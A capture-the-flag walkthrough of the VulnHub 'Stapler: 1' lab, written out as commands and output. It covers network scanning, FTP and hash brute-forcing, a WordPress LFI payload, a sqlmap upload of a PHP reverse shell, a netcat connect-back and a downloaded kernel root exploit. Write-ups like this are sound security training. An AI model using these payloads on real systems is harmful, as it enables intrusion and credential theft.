[VulnHub] Stapler: 1

This is made for BsidesLondon 2016 with average beginner/intermediate difficulty and a few twists :) Also multiple attacking vectors and paths to get shell and ROOT. Author is g0tmi1k

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.132/24)

Target: Stapler: 1 (10.1.1.138/24)

Vulnerability & Exploit

FTP service allow Anonymous login
WordPress username and password bruteforce attack
WEB application Full Path Disclosure
WordPress Advanced Video Plugin 1.0 - Local File Inclusion
Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ in bpf(BPF_PROG_LOAD) Local Root Exploit

Method

Scanned the network to discover the target server [arp-scan]
Port scanned the target to discover running services and open ports [masscan && nmap]
Web application scanned to dig more information about web service [nikto]
Scan specific vulnerability for WordPress CMS [wpscan]
Exploit WordPress plugin LFI vulnerability to read sensitive informtion
Connect to target server’s MySQL service as root and write reverse PHP web shell
Connect to target server’s MySQL service and download wp_users table which username and password hash saved in
Crack WordPress administrator/editor account and login to upload webshell [php-reverse-shell]
Enumeration and exploit the local priviledge vulnerability to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address.

root@kali:~/myExercises/stapler# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:f1:61:7e   VMware, Inc.
10.1.1.138    00:0c:29:b4:04:59   VMware, Inc.
10.1.1.254    00:50:56:e8:0a:52   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.283 seconds (112.13 hosts/sec). 4 responded

10.1.1.138 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

root@kali:~/myExercises/stapler# masscan -p1-65535 10.1.1.138/32 --rate=10000 | cut -d ' ' -f 4 | cut -d '/' -f 1 | tee 138_masscan.txt

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-08-12 11:19:28 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
12380
22
21
53
3306
666
80

root@kali:~/myExercises/stapler# tr '\n' ',' < 138_masscan.txt
12380,22,21,53,3306,666,80,root@kali:~/myExercises/stapler#

...truncated...
Nmap scan report for 10.1.1.138
Host is up (0.00044s latency).
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_  256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp    open  domain  dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp    open  http
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
666/tcp   open  doom?
3306/tcp  open  mysql   MySQL 5.7.13-0ubuntu0.16.04.2
| mysql-info:
|   Protocol: 53
|   Version: .7.13-0ubuntu0.16.04.2
|   Thread ID: 8440
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Support41Auth, ODBCClient, InteractiveClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, LongColumnFlag, SupportsCompression, FoundRows
|   Status: Autocommit
|_  Salt: 'pw|)\x07ib\x0ByIS3P<Y^jO\x10
12380/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
...truncated...

Based on the result of NMAP scan, firstly, I found FTP port 21 is open and Anonymous login allowed. So I connected to the FTP server and found a file note:

root@kali:~/myExercises/stapler# ftp 10.1.1.138
Connected to 10.1.1.138.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (10.1.1.138:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.01 secs (14.1935 kB/s)
ftp>


root@kali:~/myExercises/stapler# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
root@kali:~/myExercises/stapler#

From the note file, I know that elly is a ftp user and there could be something about payload stored in her FTP folder.

Then I did a quick FTP login brute force attack against to user elly by using hydra with parameter -e nsr.

root@kali:~/myExercises/stapler# hydra -l elly -e nsr ftp://10.1.1.138
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-15 22:56:07
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.1.1.138   login: elly   password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-15 22:56:11

Great! elly’s password is ylle

So far, nothing else found, so I decided to move on.

port 12380 is open and running HTTP with SSL. so I did a nikto scan against port 12380

- Nikto v2.1.6/2.1.5
+ Target Host: 10.1.1.138
+ Target Port: 12380
+ GET Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ GET The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET "robots.txt" contains 2 entries which should be manually viewed.
+ OPTIONS Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ GET Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /phpmyadmin/: phpMyAdmin directory found

From the nikto scan, we found that WEB server on port 12380 is a HTTPS service and there are three hidden directories /admin112233, /blogblog and /phpmyadmin.

so I checked them one by one, and 1st one is /admin112233, but this is a XSS hook page :(

root@kali:~/myExercises/stapler# curl -k https://10.1.1.138:12380/admin112233/
<html>
<head>
<title>mwwhahahah</title>
<body>
<noscript>Give yourself a cookie! Javascript didn't run =)</noscript>
<script type="text/javascript">window.alert("This could of been a BeEF-XSS hook ;)");window.location="http://www.xss-payloads.com/";</script>
</body>
</html>

2nd one is /blogblog, and it’s using WordPress CMS.

so next, I run wpscan and found one plugin which is vulnerable to WordPress Advanced Video Plugin 1.0 - Local File Inclusion

...truncated...
[+] We found 4 plugins:

[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
 |  Latest version: 1.0 (up to date)
 |  Location: https://10.1.1.138:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 |  Readme: https://10.1.1.138:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://10.1.1.138:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
...truncated...

Also I use wpscan to enumerate available users and got the following result:

+----+---------+-----------------+
    | Id | Login   | Name            |
    +----+---------+-----------------+
    | 1  | john    | John Smith      |
    | 2  | elly    | Elly Jones      |
    | 3  | peter   | Peter Parker    |
    | 4  | barry   | Barry Atkins    |
    | 5  | heather | Heather Neville |
    | 6  | garry   | garry           |
    | 7  | harry   | harry           |
    | 8  | scott   | scott           |
    | 9  | kathy   | kathy           |
    | 10 | tim     | tim             |
    +----+---------+-----------------+

By exploiting the Local File Inclusion vulnerability, https://10.1.1.138:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

Then, back to home page and check the frontpage by right clicking and choose Inspect Element (Q). Then find the thumbnail file location which is https://10.1.1.138:12380/blogblog/wp-content/uploads/577490208.jpeg in this case.

Then I use curl to download the thumbnail file and save it to my attacking machine.

root@kali:~/myExercises/stapler# curl -k https://10.1.1.138:12380/blogblog/wp-content/uploads/577490208.jpeg > 1.jpeg
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3042  100  3042    0     0   7509      0 --:--:-- --:--:-- --:--:--  7529

Then checking the file 1.jepg which actually is the wp-config.php file.

root@kali:~/myExercises/stapler# strings 1.jpeg
<?php
 * The base configurations of the WordPress.
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 * @package WordPress
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
 * Authentication Unique Keys and Salts.
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 * @since 2.6.0
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
 * WordPress Database Table prefix.
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
$table_prefix  = 'wp_';
 * For developers: WordPress debugging mode.
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
 define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);

Now I got the MySQL database ROOT login password and the DB name:

DB_USER: root
DB_PASS: plbkac
DB_NAME: wordpress

When exploiting the Local File Inclusion vulnerability, I found the full path disclosure as well when a non-exist file name is given.

The full path is /var/www/https/blogblog/

Due to obtain the MySQL root and password, I was connected to target MySQL server with ROOT priviledge.

root@kali:~/myExercises/stapler# mysql -h 10.1.1.138 -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8514
Server version: 5.7.13-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.02 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.01 sec)

mysql>
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass                          | user_nicename | user_email            | user_url         | user_registered     | user_activation_key | user_status | display_name    |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
|  1 | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john          | john@red.localhost    | http://localhost | 2016-06-03 23:18:47 |                     |           0 | John Smith      |
|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly          | Elly@red.localhost    |                  | 2016-06-05 16:11:33 |                     |           0 | Elly Jones      |
|  3 | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter         | peter@red.localhost   |                  | 2016-06-05 16:13:16 |                     |           0 | Peter Parker    |
|  4 | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry         | barry@red.localhost   |                  | 2016-06-05 16:14:26 |                     |           0 | Barry Atkins    |
|  5 | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather       | heather@red.localhost |                  | 2016-06-05 16:18:04 |                     |           0 | Heather Neville |
|  6 | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry         | garry@red.localhost   |                  | 2016-06-05 16:18:23 |                     |           0 | garry           |
|  7 | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry         | harry@red.localhost   |                  | 2016-06-05 16:18:41 |                     |           0 | harry           |
|  8 | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott         | scott@red.localhost   |                  | 2016-06-05 16:18:59 |                     |           0 | scott           |
|  9 | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy         | kathy@red.localhost   |                  | 2016-06-05 16:19:14 |                     |           0 | kathy           |
| 10 | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim           | tim@red.localhost     |                  | 2016-06-05 16:19:29 |                     |           0 | tim             |
| 11 | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe           | zoe@red.localhost     |                  | 2016-06-05 16:19:50 |                     |           0 | ZOE             |
| 12 | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave          | dave@red.localhost    |                  | 2016-06-05 16:20:09 |                     |           0 | Dave            |
| 13 | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon         | simon@red.localhost   |                  | 2016-06-05 16:20:35 |                     |           0 | Simon           |
| 14 | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby          | abby@red.localhost    |                  | 2016-06-05 16:20:53 |                     |           0 | Abby            |
| 15 | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki         | vicki@red.localhost   |                  | 2016-06-05 16:21:14 |                     |           0 | Vicki           |
| 16 | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam           | pam@red.localhost     |                  | 2016-06-05 16:42:23 |                     |           0 | Pam             |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.01 sec)

mysql>

Then I use john the ripper to crack those hahses and got the following cracked:

root@kali:~/myExercises/stapler# john --show 2.txt
John:incorrect
Elly:ylle
barry:washere
heather:passphrase
garry:football
harry:monkey
scott:cookie
kathy:coolgirl
tim:thumb
ZOE:partyqueen
Dave:damachine
Pam:0520

12 password hashes cracked, 4 left

After tried all cracked user/password, I found john has higher priviledge and can be used to upload reverse web shell.

Login to WordPress with john’s password, and then upload pentestmonkey’s PHP reverse shell(listen on local port 443) as a plugin.

After installed the plugin, I went to https://10.1.1.138:12380/blogblog/wp-content/uploads/ to check if the file has been uploaded.

Greet! The web shell file rsh.php has already been uploaded successfully.

In terms to upload web shell, there is another method by using MySQL to write file.

From the previous stage, I got the full path is /var/www/https/blogblog/ and also the writable directory is /blogblog/wp-content/uploads/. And the target MySQL root login password is plbkac.

So, now, I should be able to write web shell to target server via MySQL:

root@kali:~/myExercises/stapler# sqlmap -d mysql://root:plbkac@10.1.1.138:3306/wordpress --file-write=rsh.php --file-dest=/var/www/https/blogblog/wp-content/uploads/rsh443.php
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:12:04

[23:12:04] [INFO] connection to mysql server 10.1.1.138:3306 established
[23:12:04] [INFO] testing MySQL
[23:12:04] [INFO] resumed: [[u'1']]...
[23:12:04] [INFO] confirming MySQL
[23:12:04] [INFO] resumed: [[u'1']]...
[23:12:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[23:12:04] [INFO] fingerprinting the back-end DBMS operating system
[23:12:04] [INFO] resumed: [[u'0']]...
[23:12:04] [INFO] the back-end DBMS operating system is Linux
[23:12:04] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'wordpress.sqlmapfile'")
[23:12:05] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'wordpress.sqlmapfilehex'")
[23:12:05] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'wordpress.sqlmapfile'")
do you want confirmation that the local file 'rsh.php' has been successfully written on the back-end DBMS file system ('/var/www/https/blogblog/wp-content/uploads/rsh443.php')? [Y/n] Y
[23:12:09] [INFO] the local file 'rsh.php' and the remote file '/var/www/https/blogblog/wp-content/uploads/rsh443.php' have the same size (5495 B)
[23:12:09] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'wordpress.sqlmapfilehex'")
[23:12:09] [INFO] connection to mysql server 10.1.1.138:3306 closed
root@kali:~/myExercises/stapler#

Great! looks like the web shell uploaded successfully.

Now got in and time to get ROOT.

Set up nc to listen on local port 443 and then trigger the shell to connect back by accessing the web shell page on https://10.1.1.138:12380/blogblog/wp-content/uploads/rsh.php.

root@kali:~/myExercises/stapler# nc -lvnp 443
listening on [any] 443 ...
connect to [10.1.1.132] from (UNKNOWN) [10.1.1.138] 37668
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 16:08:13 up 1 day,  1:59,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ 

After enumeration, I know the target machine is running Linux Kernel 4.4.0, so by using searchsploit to search any existed vulnerability to against the target machine, and lucky I found one Local Root Exploit which is Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit

$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-08-13 20:17:02--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.253.113
Connecting to github.com (github.com)|192.30.253.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-08-13 20:17:03--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.100.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.100.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: '39772.zip'

     0K ......                                                100% 14.5M=0s

2016-08-13 20:17:03 (14.5 MB/s) - '39772.zip' saved [7115/7115]

$ unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store
  inflating: 39772/crasher.tar
  inflating: __MACOSX/39772/._crasher.tar
  inflating: 39772/exploit.tar
  inflating: __MACOSX/39772/._exploit.tar
$
$ cd 39772
$ ls
crasher.tar
exploit.tar
$ tar vxf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cd ebpf_mapfd_doubleput_exploit
$ ls
compile.sh
doubleput.c
hello.c
suidhelper.c
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
$ ls -la
total 60
drwxr-x--- 2 www-data www-data  4096 Aug 13 20:18 .
drwxr-xr-x 4 www-data www-data  4096 Aug 13 20:17 ..
-rwxr-x--- 1 www-data www-data   155 Apr 25 23:25 compile.sh
-rwxrwxrwx 1 www-data www-data 12332 Aug 13 20:18 doubleput
-rw-r----- 1 www-data www-data  4188 Apr 25 23:25 doubleput.c
-rwxrwxrwx 1 www-data www-data  8024 Aug 13 20:18 hello
-rw-r----- 1 www-data www-data  2186 Apr 25 23:25 hello.c
-rwxrwxrwx 1 www-data www-data  7520 Aug 13 20:18 suidhelper
-rw-r----- 1 www-data www-data   255 Apr 25 23:25 suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
id
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
uid=0(root) gid=0(root) groups=0(root),33(www-data)
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
python -c "import pty; pty.spawn('/bin/bash');"
root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit#

Brilliant! we now got ROOT and caught the flag file under directory /root/

root@red:/root# ls
ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
root@red:/root# cat flag.txt
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

root@red:/root#

F4l13n5n0w

Info Security & Pen Testing learning notes